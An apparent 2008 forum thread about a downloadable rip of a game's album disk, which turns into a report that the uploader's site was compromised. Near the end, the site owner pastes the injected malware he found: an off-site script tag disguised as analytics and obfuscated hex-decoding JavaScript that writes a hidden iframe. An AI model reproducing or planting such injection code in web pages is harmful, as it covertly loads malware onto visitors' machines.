Post by: 黒い灯影 on April 11, 2008, 09:36:20 pm
GT1 Album Disk
The rare GT1 Album Disk is now available for download. Enjoy. (...and I mean it)

I think there might be something wrong with it.
Nope it's working

Fantastic stuff like this is duly rewarded.  +10 rep.

Works fine for me up until it reaches the choice in Alpina's scene, then it gets stuck in an infinite loop.  This is by no fault of your rip: looks like a bug in the software.

Don't know why your ISO is twice as large as the files on the disk though.

For those of you that don't want to download 180 megabytes, you might like to know there's nothing new here.  The album disk is (as I expected) just a shortcut menu to all the major scenes in GT1.  So there's no new graphics, but it does reveal some of the story a little easier (especially to those that don't read Japanese.)  And it does come with the GT1 1.01 update, which you obviously can't get from the Sogna website anymore.

Yeah, I was wondering why it was about 400 MBs, I'll re-upload it when I get home. a smaller version.
That program I used to rip it was a cheap free program, since I had just recently re-installed windows.
I'll make a proper rip tonight.

Thanks for the Rep!

The text in Flash files is raw ANSI.  In this case, Shift-JIS.  You just need to look for a sequence of bytes that identifies the start of a text-type block (0h, 0h, 0h, 1h, 0h, 0h, 0h, 0h, 0h, 0h, 0h, 1h), which is then followed by a number of offsets for each text block, then follows the Shift-JIS strings.  Not hard if you know what to look for.

Here's the GT1 scripts I extracted a year or so ago. (http://www.jonathandgriffith.com/files/forum/gt1scripts.zip)  Files starting in underscore have been confirmed as used in-game.  Text in the files without an underscore may be leftover or unreachable text as I couldn't find a way to get to it.

The link isn't working, showing this message :

Confirmed:

McAfee has automatically blocked and removed a potentially harmful script.

About this Script
Detected: JS/Psyme (Virus)

A script is a small program that automates certain tasks on your computer. Potentially unwanted scripts can damage valuable files, disrupt performance, and make unauthorized registry changes on your computer.

McAfee has automatically blocked and removed a Trojan.

About this Trojan
Detected: JS/Psyme (Trojan)
Location: C:\Documents and Settings\Jonathan\Local Settings\Temporary Internet Files\Content.IE5\CXQ4R2DQ\ninjahanzo_com[2].htm

Trojans appear as legitimate programs but can damage valuable files, disrupt performance, and allow unauthorized access to your computer.

黒い灯影, you need to take that Trojan script out of your pages.

The 7zip file for the GT1 Album disk download is clean though.  You can safely override your blocking software to get to that file.

Holy Mack!!! I'll get right on it, I'll just delete everything off the site, because I haven't touched my site in a long time, when I went back a while ago, I noticed all my index pages, were blank. I guess a virus somehow got into my site and inserted a script that loads the virus(off-site).

I opened the index.html and only found this, nothing else
Code: [Select]
<script src="http://safe.google-signature.com/webanalytics.js"></script><script>function v47f9082b8ee84(v47f9082b8ee8f){ function v47f9082b8ee9b () {return 16;}
return(parseInt(v47f9082b8ee8f,v47f9082b8ee9b()));}function v47f9082b8eed1(v47f9082b8eed7){ function v47f9082b8eeeb () {return 2;} var v47f9082b8eedd='';for(v47f9082b8eee2=0;
v47f9082b8eee2<v47f9082b8eed7.length; v47f9082b8eee2+=v47f9082b8eeeb()){ v47f9082b8eedd+=(String.fromCharCode(v47f9082b8ee84(v47f9082b8eed7.substr(v47f9082b8eee2,
v47f9082b8eeeb()))));}return v47f9082b8eedd;}
document.write(v47f9082b8eed1('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D363764303930613731207372633D5C27687474703A2F2F75726C2F3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A343030323030292B273130326235656532386530625C272077696474683D363930206865696768743D353830207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));
</script>

I'm deleting everything (well almost everything) off that site.
